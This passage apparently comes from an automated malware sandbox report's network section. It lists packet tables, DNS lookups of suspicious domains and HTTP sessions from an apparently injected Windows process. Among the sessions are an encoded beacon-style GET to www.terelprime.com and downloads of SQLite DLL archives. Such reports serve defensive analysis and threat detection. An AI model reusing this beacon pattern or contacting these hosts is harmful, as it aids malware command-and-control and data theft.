                                May 20, 2024 08:55:08.747713089 CEST4917180192.168.2.2254.38.220.85
                                May 20, 2024 08:55:08.747915983 CEST4917180192.168.2.2254.38.220.85
                                May 20, 2024 08:55:08.752834082 CEST804917154.38.220.85192.168.2.22
                                May 20, 2024 08:55:08.752943993 CEST4917180192.168.2.2254.38.220.85
                                May 20, 2024 08:55:08.754935026 CEST4917180192.168.2.2254.38.220.85
                                May 20, 2024 08:55:08.757704020 CEST804917154.38.220.85192.168.2.22
                                May 20, 2024 08:55:08.762553930 CEST804917154.38.220.85192.168.2.22
                                May 20, 2024 08:55:08.812988043 CEST804917154.38.220.85192.168.2.22
                                May 20, 2024 08:55:13.857461929 CEST4917280192.168.2.22194.9.94.86
                                May 20, 2024 08:55:13.867017984 CEST8049172194.9.94.86192.168.2.22
                                May 20, 2024 08:55:13.867098093 CEST4917280192.168.2.22194.9.94.86
                                May 20, 2024 08:55:13.867309093 CEST4917280192.168.2.22194.9.94.86
                                May 20, 2024 08:55:13.876718044 CEST8049172194.9.94.86192.168.2.22
                                May 20, 2024 08:55:13.876796007 CEST4917280192.168.2.22194.9.94.86
                                May 20, 2024 08:55:13.881443977 CEST8049172194.9.94.86192.168.2.22
                                May 20, 2024 08:55:13.936994076 CEST8049172194.9.94.86192.168.2.22
                                May 20, 2024 08:55:14.517338991 CEST8049172194.9.94.86192.168.2.22
                                May 20, 2024 08:55:14.519736052 CEST8049172194.9.94.86192.168.2.22
                                May 20, 2024 08:55:14.519771099 CEST8049172194.9.94.86192.168.2.22
                                May 20, 2024 08:55:14.519804955 CEST8049172194.9.94.86192.168.2.22
                                May 20, 2024 08:55:14.519906998 CEST4917280192.168.2.22194.9.94.86
                                May 20, 2024 08:55:14.519906998 CEST4917280192.168.2.22194.9.94.86
                                May 20, 2024 08:55:14.524478912 CEST8049172194.9.94.86192.168.2.22
                                May 20, 2024 08:55:14.529215097 CEST8049172194.9.94.86192.168.2.22
                                May 20, 2024 08:55:14.529293060 CEST4917280192.168.2.22194.9.94.86
                                May 20, 2024 08:55:15.377993107 CEST4917280192.168.2.22194.9.94.86
                                May 20, 2024 08:55:16.392143965 CEST4917380192.168.2.22194.9.94.86
                                May 20, 2024 08:55:16.404548883 CEST8049173194.9.94.86192.168.2.22
                                May 20, 2024 08:55:16.404845953 CEST4917380192.168.2.22194.9.94.86
                                May 20, 2024 08:55:16.405143023 CEST4917380192.168.2.22194.9.94.86
                                May 20, 2024 08:55:16.414685965 CEST8049173194.9.94.86192.168.2.22
                                May 20, 2024 08:55:16.414742947 CEST4917380192.168.2.22194.9.94.86
                                May 20, 2024 08:55:16.417630911 CEST8049173194.9.94.86192.168.2.22
                                May 20, 2024 08:55:16.423718929 CEST8049173194.9.94.86192.168.2.22
                                May 20, 2024 08:55:19.122586012 CEST4917480192.168.2.22194.9.94.86
                                May 20, 2024 08:55:19.127557993 CEST8049174194.9.94.86192.168.2.22
                                May 20, 2024 08:55:19.127625942 CEST4917480192.168.2.22194.9.94.86
                                May 20, 2024 08:55:19.127932072 CEST4917480192.168.2.22194.9.94.86
                                May 20, 2024 08:55:19.132823944 CEST8049174194.9.94.86192.168.2.22
                                May 20, 2024 08:55:19.132879972 CEST4917480192.168.2.22194.9.94.86
                                May 20, 2024 08:55:19.137648106 CEST8049174194.9.94.86192.168.2.22
                                May 20, 2024 08:55:19.142347097 CEST8049174194.9.94.86192.168.2.22
                                May 20, 2024 08:55:19.193816900 CEST8049174194.9.94.86192.168.2.22
                                May 20, 2024 08:55:19.799331903 CEST8049174194.9.94.86192.168.2.22
                                May 20, 2024 08:55:19.799351931 CEST8049174194.9.94.86192.168.2.22
                                May 20, 2024 08:55:19.799715042 CEST4917480192.168.2.22194.9.94.86
                                May 20, 2024 08:55:19.801779032 CEST8049174194.9.94.86192.168.2.22
                                May 20, 2024 08:55:19.804297924 CEST8049174194.9.94.86192.168.2.22
                                May 20, 2024 08:55:19.804316998 CEST8049174194.9.94.86192.168.2.22
                                May 20, 2024 08:55:19.804348946 CEST8049174194.9.94.86192.168.2.22
                                May 20, 2024 08:55:19.804367065 CEST8049174194.9.94.86192.168.2.22
                                May 20, 2024 08:55:19.804409027 CEST4917480192.168.2.22194.9.94.86
                                May 20, 2024 08:55:19.804533958 CEST4917480192.168.2.22194.9.94.86
                                May 20, 2024 08:55:19.809060097 CEST8049174194.9.94.86192.168.2.22
                                May 20, 2024 08:55:19.809420109 CEST4917480192.168.2.22194.9.94.86
                                May 20, 2024 08:55:19.814682007 CEST8049174194.9.94.86192.168.2.22
                                May 20, 2024 08:55:19.815005064 CEST4917480192.168.2.22194.9.94.86
                                May 20, 2024 08:55:20.011558056 CEST4916780192.168.2.2245.33.6.223
                                May 20, 2024 08:55:20.019905090 CEST804916745.33.6.223192.168.2.22
                                May 20, 2024 08:55:20.020005941 CEST4916780192.168.2.2245.33.6.223
                                May 20, 2024 08:55:20.645982027 CEST4917480192.168.2.22194.9.94.86
                                May 20, 2024 08:55:21.649389982 CEST4917580192.168.2.22194.9.94.86
                                May 20, 2024 08:55:21.654356003 CEST8049175194.9.94.86192.168.2.22
                                May 20, 2024 08:55:21.654422998 CEST4917580192.168.2.22194.9.94.86
                                May 20, 2024 08:55:21.654726028 CEST4917580192.168.2.22194.9.94.86
                                May 20, 2024 08:55:21.673979044 CEST8049175194.9.94.86192.168.2.22
                                May 20, 2024 08:55:22.356550932 CEST8049175194.9.94.86192.168.2.22
                                May 20, 2024 08:55:22.362170935 CEST8049175194.9.94.86192.168.2.22
                                May 20, 2024 08:55:22.362186909 CEST8049175194.9.94.86192.168.2.22
                                May 20, 2024 08:55:22.362201929 CEST8049175194.9.94.86192.168.2.22
                                May 20, 2024 08:55:22.362413883 CEST4917580192.168.2.22194.9.94.86
                                May 20, 2024 08:55:22.366945028 CEST8049175194.9.94.86192.168.2.22
                                May 20, 2024 08:55:22.366986990 CEST8049175194.9.94.86192.168.2.22
                                May 20, 2024 08:55:22.367000103 CEST8049175194.9.94.86192.168.2.22
                                May 20, 2024 08:55:22.367039919 CEST8049175194.9.94.86192.168.2.22
                                May 20, 2024 08:55:22.367104053 CEST4917580192.168.2.22194.9.94.86
                                May 20, 2024 08:55:22.367104053 CEST4917580192.168.2.22194.9.94.86
                                May 20, 2024 08:55:22.367474079 CEST4917580192.168.2.22194.9.94.86
                                May 20, 2024 08:55:22.410319090 CEST8049175194.9.94.86192.168.2.22
                                May 20, 2024 08:55:27.403753042 CEST4917680192.168.2.2291.195.240.19
                                May 20, 2024 08:55:27.408827066 CEST804917691.195.240.19192.168.2.22
                                May 20, 2024 08:55:27.408891916 CEST4917680192.168.2.2291.195.240.19
                                May 20, 2024 08:55:27.409249067 CEST4917680192.168.2.2291.195.240.19
                                May 20, 2024 08:55:27.414136887 CEST804917691.195.240.19192.168.2.22
                                May 20, 2024 08:55:27.414730072 CEST4917680192.168.2.2291.195.240.19
                                May 20, 2024 08:55:27.465049028 CEST804917691.195.240.19192.168.2.22
                                May 20, 2024 08:55:27.469695091 CEST804917691.195.240.19192.168.2.22
                                May 20, 2024 08:55:28.918831110 CEST4917680192.168.2.2291.195.240.19
                                May 20, 2024 08:55:28.932301998 CEST804917691.195.240.19192.168.2.22
                                May 20, 2024 08:55:28.932368040 CEST4917680192.168.2.2291.195.240.19
                                May 20, 2024 08:55:29.935611010 CEST4917780192.168.2.2291.195.240.19
                                May 20, 2024 08:55:29.940828085 CEST804917791.195.240.19192.168.2.22
                                May 20, 2024 08:55:29.940939903 CEST4917780192.168.2.2291.195.240.19
                                May 20, 2024 08:55:29.941282034 CEST4917780192.168.2.2291.195.240.19
                                May 20, 2024 08:55:29.998286963 CEST804917791.195.240.19192.168.2.22
                                May 20, 2024 08:55:30.600327015 CEST804917791.195.240.19192.168.2.22
                                May 20, 2024 08:55:30.605024099 CEST804917791.195.240.19192.168.2.22
                                May 20, 2024 08:55:30.605137110 CEST4917780192.168.2.2291.195.240.19
                                May 20, 2024 08:55:31.445918083 CEST4917780192.168.2.2291.195.240.19
                                May 20, 2024 08:55:32.469595909 CEST4917880192.168.2.2291.195.240.19
                                May 20, 2024 08:55:32.482845068 CEST804917891.195.240.19192.168.2.22
                                May 20, 2024 08:55:32.483043909 CEST4917880192.168.2.2291.195.240.19
                                May 20, 2024 08:55:32.483613014 CEST4917880192.168.2.2291.195.240.19
                                May 20, 2024 08:55:32.492508888 CEST804917891.195.240.19192.168.2.22
                                May 20, 2024 08:55:32.492525101 CEST804917891.195.240.19192.168.2.22
                                May 20, 2024 08:55:32.492613077 CEST4917880192.168.2.2291.195.240.19
                                May 20, 2024 08:55:32.497374058 CEST804917891.195.240.19192.168.2.22
                                May 20, 2024 08:55:32.545089960 CEST804917891.195.240.19192.168.2.22
                                May 20, 2024 08:55:35.002954006 CEST4917980192.168.2.2291.195.240.19
                                May 20, 2024 08:55:35.008616924 CEST804917991.195.240.19192.168.2.22
                                May 20, 2024 08:55:35.008699894 CEST4917980192.168.2.2291.195.240.19
                                May 20, 2024 08:55:35.008862019 CEST4917980192.168.2.2291.195.240.19
                                May 20, 2024 08:55:35.072999954 CEST804917991.195.240.19192.168.2.22
                                May 20, 2024 08:55:35.660337925 CEST804917991.195.240.19192.168.2.22
                                May 20, 2024 08:55:35.665081978 CEST804917991.195.240.19192.168.2.22
                                May 20, 2024 08:55:35.665227890 CEST4917980192.168.2.2291.195.240.19
                                May 20, 2024 08:55:35.665227890 CEST4917980192.168.2.2291.195.240.19
                                May 20, 2024 08:55:35.721931934 CEST804917991.195.240.19192.168.2.22
                                May 20, 2024 08:55:40.703985929 CEST4918080192.168.2.22198.12.241.35
                                May 20, 2024 08:55:40.713890076 CEST8049180198.12.241.35192.168.2.22
                                May 20, 2024 08:55:40.715897083 CEST4918080192.168.2.22198.12.241.35
                                May 20, 2024 08:55:40.715897083 CEST4918080192.168.2.22198.12.241.35
                                May 20, 2024 08:55:40.723248959 CEST8049180198.12.241.35192.168.2.22
                                May 20, 2024 08:55:40.723274946 CEST8049180198.12.241.35192.168.2.22
                                May 20, 2024 08:55:40.727946997 CEST8049180198.12.241.35192.168.2.22
                                May 20, 2024 08:55:43.239785910 CEST4918180192.168.2.22198.12.241.35
                                May 20, 2024 08:55:43.293009043 CEST8049181198.12.241.35192.168.2.22
                                May 20, 2024 08:55:43.293121099 CEST4918180192.168.2.22198.12.241.35
                                May 20, 2024 08:55:43.301086903 CEST4918180192.168.2.22198.12.241.35
                                May 20, 2024 08:55:43.311994076 CEST8049181198.12.241.35192.168.2.22
                                May 20, 2024 08:55:44.029783010 CEST8049181198.12.241.35192.168.2.22
                                May 20, 2024 08:55:44.031785011 CEST8049181198.12.241.35192.168.2.22
                                May 20, 2024 08:55:44.031855106 CEST4918180192.168.2.22198.12.241.35
                                May 20, 2024 08:55:44.036679029 CEST8049181198.12.241.35192.168.2.22
                                May 20, 2024 08:55:44.036700010 CEST8049181198.12.241.35192.168.2.22
                                May 20, 2024 08:55:44.036818981 CEST4918180192.168.2.22198.12.241.35
                                May 20, 2024 08:55:44.041630030 CEST8049181198.12.241.35192.168.2.22
                                May 20, 2024 08:55:44.041649103 CEST8049181198.12.241.35192.168.2.22
                                May 20, 2024 08:55:44.041678905 CEST8049181198.12.241.35192.168.2.22
                                May 20, 2024 08:55:44.041696072 CEST8049181198.12.241.35192.168.2.22
                                May 20, 2024 08:55:44.041726112 CEST4918180192.168.2.22198.12.241.35
                                May 20, 2024 08:55:44.041780949 CEST4918180192.168.2.22198.12.241.35
                                May 20, 2024 08:55:44.051379919 CEST8049181198.12.241.35192.168.2.22
                                May 20, 2024 08:55:44.051399946 CEST8049181198.12.241.35192.168.2.22
                                May 20, 2024 08:55:44.051870108 CEST4918180192.168.2.22198.12.241.35
                                May 20, 2024 08:55:44.053814888 CEST8049181198.12.241.35192.168.2.22
                                May 20, 2024 08:55:44.053833961 CEST8049181198.12.241.35192.168.2.22
                                May 20, 2024 08:55:44.057779074 CEST4918180192.168.2.22198.12.241.35
                                May 20, 2024 08:55:44.059611082 CEST8049181198.12.241.35192.168.2.22
                                May 20, 2024 08:55:44.060435057 CEST4918180192.168.2.22198.12.241.35
                                May 20, 2024 08:55:44.799575090 CEST4918180192.168.2.22198.12.241.35
                                May 20, 2024 08:55:45.813865900 CEST4918280192.168.2.22198.12.241.35
                                May 20, 2024 08:55:45.819080114 CEST8049182198.12.241.35192.168.2.22
                                May 20, 2024 08:55:45.819147110 CEST4918280192.168.2.22198.12.241.35
                                May 20, 2024 08:55:45.819449902 CEST4918280192.168.2.22198.12.241.35
                                May 20, 2024 08:55:45.824371099 CEST8049182198.12.241.35192.168.2.22
                                May 20, 2024 08:55:45.824445009 CEST4918280192.168.2.22198.12.241.35
                                May 20, 2024 08:55:45.829345942 CEST8049182198.12.241.35192.168.2.22
                                May 20, 2024 08:55:45.834125042 CEST8049182198.12.241.35192.168.2.22
                                May 20, 2024 08:55:45.884947062 CEST8049182198.12.241.35192.168.2.22
                                May 20, 2024 08:55:46.535566092 CEST8049182198.12.241.35192.168.2.22
                                May 20, 2024 08:55:46.537499905 CEST8049182198.12.241.35192.168.2.22
                                May 20, 2024 08:55:46.537729025 CEST4918280192.168.2.22198.12.241.35
                                May 20, 2024 08:55:46.542284012 CEST8049182198.12.241.35192.168.2.22
                                May 20, 2024 08:55:46.542306900 CEST8049182198.12.241.35192.168.2.22
                                May 20, 2024 08:55:46.542412043 CEST4918280192.168.2.22198.12.241.35
                                May 20, 2024 08:55:46.551820040 CEST8049182198.12.241.35192.168.2.22
                                May 20, 2024 08:55:46.551840067 CEST8049182198.12.241.35192.168.2.22
                                May 20, 2024 08:55:46.551909924 CEST4918280192.168.2.22198.12.241.35
                                May 20, 2024 08:55:46.561337948 CEST8049182198.12.241.35192.168.2.22
                                May 20, 2024 08:55:46.564086914 CEST8049182198.12.241.35192.168.2.22
                                May 20, 2024 08:55:46.564125061 CEST8049182198.12.241.35192.168.2.22
                                May 20, 2024 08:55:46.564146996 CEST8049182198.12.241.35192.168.2.22
                                May 20, 2024 08:55:46.564157009 CEST4918280192.168.2.22198.12.241.35
                                May 20, 2024 08:55:46.564218044 CEST4918280192.168.2.22198.12.241.35
                                May 20, 2024 08:55:46.568842888 CEST8049182198.12.241.35192.168.2.22
                                May 20, 2024 08:55:46.568957090 CEST4918280192.168.2.22198.12.241.35
                                May 20, 2024 08:55:47.326950073 CEST4918280192.168.2.22198.12.241.35
                                May 20, 2024 08:55:48.344868898 CEST4918380192.168.2.22198.12.241.35
                                May 20, 2024 08:55:48.349787951 CEST8049183198.12.241.35192.168.2.22
                                May 20, 2024 08:55:48.349848032 CEST4918380192.168.2.22198.12.241.35
                                May 20, 2024 08:55:48.350016117 CEST4918380192.168.2.22198.12.241.35
                                May 20, 2024 08:55:48.388688087 CEST8049183198.12.241.35192.168.2.22
                                May 20, 2024 08:55:49.007123947 CEST8049183198.12.241.35192.168.2.22
                                May 20, 2024 08:55:49.007141113 CEST8049183198.12.241.35192.168.2.22
                                May 20, 2024 08:55:49.007433891 CEST4918380192.168.2.22198.12.241.35
                                May 20, 2024 08:55:49.007433891 CEST4918380192.168.2.22198.12.241.35
                                May 20, 2024 08:55:49.021259069 CEST8049183198.12.241.35192.168.2.22

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                May 20, 2024 08:53:31.811053991 CEST138138192.168.2.22192.168.2.255
                                May 20, 2024 08:53:37.247651100 CEST5456253192.168.2.228.8.8.8
                                May 20, 2024 08:53:37.264147043 CEST53545628.8.8.8192.168.2.22
                                May 20, 2024 08:54:15.236864090 CEST5291753192.168.2.228.8.8.8
                                May 20, 2024 08:54:15.253571033 CEST53529178.8.8.8192.168.2.22
                                May 20, 2024 08:54:20.249505043 CEST6275153192.168.2.228.8.8.8
                                May 20, 2024 08:54:20.377545118 CEST53627518.8.8.8192.168.2.22
                                May 20, 2024 08:54:28.446207047 CEST5789353192.168.2.228.8.8.8
                                May 20, 2024 08:54:28.468648911 CEST53578938.8.8.8192.168.2.22
                                May 20, 2024 08:54:28.468862057 CEST5789353192.168.2.228.8.8.8
                                May 20, 2024 08:54:28.495847940 CEST53578938.8.8.8192.168.2.22
                                May 20, 2024 08:54:30.062540054 CEST137137192.168.2.22192.168.2.255
                                May 20, 2024 08:54:30.824196100 CEST137137192.168.2.22192.168.2.255
                                May 20, 2024 08:54:31.588586092 CEST137137192.168.2.22192.168.2.255
                                May 20, 2024 08:54:38.217026949 CEST5482153192.168.2.228.8.8.8
                                May 20, 2024 08:54:38.226855993 CEST53548218.8.8.8192.168.2.22
                                May 20, 2024 08:54:38.227442026 CEST137137192.168.2.22192.168.2.255
                                May 20, 2024 08:54:38.983073950 CEST137137192.168.2.22192.168.2.255
                                May 20, 2024 08:54:39.747592926 CEST137137192.168.2.22192.168.2.255
                                May 20, 2024 08:54:41.528014898 CEST5471953192.168.2.228.8.8.8
                                May 20, 2024 08:54:41.567018986 CEST53547198.8.8.8192.168.2.22
                                May 20, 2024 08:54:41.567686081 CEST137137192.168.2.22192.168.2.255
                                May 20, 2024 08:54:42.321458101 CEST137137192.168.2.22192.168.2.255
                                May 20, 2024 08:54:43.085843086 CEST137137192.168.2.22192.168.2.255
                                May 20, 2024 08:54:44.865616083 CEST4988153192.168.2.228.8.8.8
                                May 20, 2024 08:54:44.911293983 CEST53498818.8.8.8192.168.2.22
                                May 20, 2024 08:54:44.911765099 CEST137137192.168.2.22192.168.2.255
                                May 20, 2024 08:54:45.675529957 CEST137137192.168.2.22192.168.2.255
                                May 20, 2024 08:54:46.439860106 CEST137137192.168.2.22192.168.2.255
                                May 20, 2024 08:54:48.226479053 CEST5499853192.168.2.228.8.8.8
                                May 20, 2024 08:54:48.235728025 CEST53549988.8.8.8192.168.2.22
                                May 20, 2024 08:54:48.236351013 CEST137137192.168.2.22192.168.2.255
                                May 20, 2024 08:54:48.998296976 CEST137137192.168.2.22192.168.2.255
                                May 20, 2024 08:54:49.762646914 CEST137137192.168.2.22192.168.2.255
                                May 20, 2024 08:54:55.543229103 CEST5278153192.168.2.228.8.8.8
                                May 20, 2024 08:54:55.597292900 CEST53527818.8.8.8192.168.2.22
                                May 20, 2024 08:55:13.788312912 CEST6392653192.168.2.228.8.8.8
                                May 20, 2024 08:55:13.857031107 CEST53639268.8.8.8192.168.2.22
                                May 20, 2024 08:55:27.392148018 CEST6551053192.168.2.228.8.8.8
                                May 20, 2024 08:55:27.403259993 CEST53655108.8.8.8192.168.2.22
                                May 20, 2024 08:55:31.531940937 CEST138138192.168.2.22192.168.2.255
                                May 20, 2024 08:55:40.671916962 CEST6267253192.168.2.228.8.8.8
                                May 20, 2024 08:55:40.699604034 CEST53626728.8.8.8192.168.2.22

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                May 20, 2024 08:53:37.247651100 CEST192.168.2.228.8.8.80xfe64Standard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                May 20, 2024 08:54:15.236864090 CEST192.168.2.228.8.8.80xc306Standard query (0)www.besthomeincome24.comA (IP address)IN (0x0001)false
                                May 20, 2024 08:54:20.249505043 CEST192.168.2.228.8.8.80xf37dStandard query (0)www.terelprime.comA (IP address)IN (0x0001)false
                                May 20, 2024 08:54:28.446207047 CEST192.168.2.228.8.8.80xe2eStandard query (0)www.sqlite.orgA (IP address)IN (0x0001)false
                                May 20, 2024 08:54:28.468862057 CEST192.168.2.228.8.8.80xe2eStandard query (0)www.sqlite.orgA (IP address)IN (0x0001)false
                                May 20, 2024 08:54:38.217026949 CEST192.168.2.228.8.8.80x739bStandard query (0)www.99b6q.xyzA (IP address)IN (0x0001)false
                                May 20, 2024 08:54:41.528014898 CEST192.168.2.228.8.8.80x8abeStandard query (0)www.99b6q.xyzA (IP address)IN (0x0001)false
                                May 20, 2024 08:54:44.865616083 CEST192.168.2.228.8.8.80x6898Standard query (0)www.99b6q.xyzA (IP address)IN (0x0001)false
                                May 20, 2024 08:54:48.226479053 CEST192.168.2.228.8.8.80xdd85Standard query (0)www.99b6q.xyzA (IP address)IN (0x0001)false
                                May 20, 2024 08:54:55.543229103 CEST192.168.2.228.8.8.80x7e93Standard query (0)www.kinkynerdspro.blogA (IP address)IN (0x0001)false
                                May 20, 2024 08:55:13.788312912 CEST192.168.2.228.8.8.80x5fe0Standard query (0)www.xn--matfrmn-jxa4m.seA (IP address)IN (0x0001)false
                                May 20, 2024 08:55:27.392148018 CEST192.168.2.228.8.8.80xe688Standard query (0)www.primeplay88.orgA (IP address)IN (0x0001)false
                                May 20, 2024 08:55:40.671916962 CEST192.168.2.228.8.8.80x8ed7Standard query (0)www.aceautocorp.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                May 20, 2024 08:53:37.264147043 CEST8.8.8.8192.168.2.220xfe64No error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                May 20, 2024 08:53:37.264147043 CEST8.8.8.8192.168.2.220xfe64No error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                May 20, 2024 08:54:15.253571033 CEST8.8.8.8192.168.2.220xc306Name error (3)www.besthomeincome24.comnonenoneA (IP address)IN (0x0001)false
                                May 20, 2024 08:54:20.377545118 CEST8.8.8.8192.168.2.220xf37dNo error (0)www.terelprime.com66.96.161.166A (IP address)IN (0x0001)false
                                May 20, 2024 08:54:28.468648911 CEST8.8.8.8192.168.2.220xe2eNo error (0)www.sqlite.org45.33.6.223A (IP address)IN (0x0001)false
                                May 20, 2024 08:54:28.495847940 CEST8.8.8.8192.168.2.220xe2eNo error (0)www.sqlite.org45.33.6.223A (IP address)IN (0x0001)false
                                May 20, 2024 08:54:38.226855993 CEST8.8.8.8192.168.2.220x739bName error (3)www.99b6q.xyznonenoneA (IP address)IN (0x0001)false
                                May 20, 2024 08:54:41.567018986 CEST8.8.8.8192.168.2.220x8abeName error (3)www.99b6q.xyznonenoneA (IP address)IN (0x0001)false
                                May 20, 2024 08:54:44.911293983 CEST8.8.8.8192.168.2.220x6898Name error (3)www.99b6q.xyznonenoneA (IP address)IN (0x0001)false
                                May 20, 2024 08:54:48.235728025 CEST8.8.8.8192.168.2.220xdd85Name error (3)www.99b6q.xyznonenoneA (IP address)IN (0x0001)false
                                May 20, 2024 08:54:55.597292900 CEST8.8.8.8192.168.2.220x7e93No error (0)www.kinkynerdspro.blog54.38.220.85A (IP address)IN (0x0001)false
                                May 20, 2024 08:55:13.857031107 CEST8.8.8.8192.168.2.220x5fe0No error (0)www.xn--matfrmn-jxa4m.se194.9.94.86A (IP address)IN (0x0001)false
                                May 20, 2024 08:55:13.857031107 CEST8.8.8.8192.168.2.220x5fe0No error (0)www.xn--matfrmn-jxa4m.se194.9.94.85A (IP address)IN (0x0001)false
                                May 20, 2024 08:55:27.403259993 CEST8.8.8.8192.168.2.220xe688No error (0)www.primeplay88.orgparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                May 20, 2024 08:55:27.403259993 CEST8.8.8.8192.168.2.220xe688No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                May 20, 2024 08:55:40.699604034 CEST8.8.8.8192.168.2.220x8ed7No error (0)www.aceautocorp.comaceautocorp.comCNAME (Canonical name)IN (0x0001)false
                                May 20, 2024 08:55:40.699604034 CEST8.8.8.8192.168.2.220x8ed7No error (0)aceautocorp.com198.12.241.35A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • universalmovies.top
                                • www.terelprime.com
                                • www.sqlite.org
                                • www.kinkynerdspro.blog
                                • www.xn--matfrmn-jxa4m.se
                                • www.primeplay88.org
                                • www.aceautocorp.com

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.224916566.96.161.166802108C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe
                                TimestampBytes transferredDirectionData
                                May 20, 2024 08:54:20.390882015 CEST468OUTGET /ufuh/?84O0=YGhnx96XAVFPN8tw+HM+ERdVPj6qvRaWteKDUnkDVIOF49Ku923zFB1LHsiTDOOJR3oxDyM0OU58BlZHZbBCNvk4uEj8jDacBIFePGWcdtykoT8enibuKQ6eq0+l&-Hc=N8_LbDFHuLL4ejZ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.5
                                Connection: close
                                Host: www.terelprime.com
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                May 20, 2024 08:54:20.915453911 CEST1087INHTTP/1.1 404 Not Found
                                Date: Mon, 20 May 2024 06:54:20 GMT
                                Content-Type: text/html
                                Content-Length: 867
                                Connection: close
                                Server: Apache
                                Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                Accept-Ranges: bytes
                                Age: 0
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED]
                                Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.224916645.33.6.223803240C:\Windows\SysWOW64\dfrgui.exe
                                TimestampBytes transferredDirectionData
                                May 20, 2024 08:54:28.541707993 CEST248OUTGET /2021/sqlite-dll-win32-x86-3340000.zip HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                Host: www.sqlite.org
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                May 20, 2024 08:54:29.088994026 CEST299INHTTP/1.1 404 Not Found
                                Connection: close
                                Date: Mon, 20 May 2024 06:54:29 GMT
                                Content-type: text/html; charset=utf-8
                                Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 20 6c 69 6e 65 6e 6f 3d 22 33 38 30 22 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 6f 63 75 6d 65 6e 74 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 2f 32 30 32 31 2f 73 71 6c 69 74 65 2d 64 6c 6c 2d 77 69 6e 33 32 2d 78 38 36 2d 33 33 34 30 30 30 30 2e 7a 69 70 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 0a 3c 2f 62 6f 64 79 3e 0a
                                Data Ascii: <head><title lineno="380">Not Found</title></head><body><h1>Document Not Found</h1>The document /2021/sqlite-dll-win32-x86-3340000.zip is not available on this server</body>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.224916745.33.6.223803240C:\Windows\SysWOW64\dfrgui.exe
                                TimestampBytes transferredDirectionData
                                May 20, 2024 08:54:30.160804987 CEST248OUTGET /2017/sqlite-dll-win32-x86-3210000.zip HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                Host: www.sqlite.org
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                May 20, 2024 08:54:30.700171947 CEST1236INHTTP/1.1 200 OK
                                Connection: keep-alive
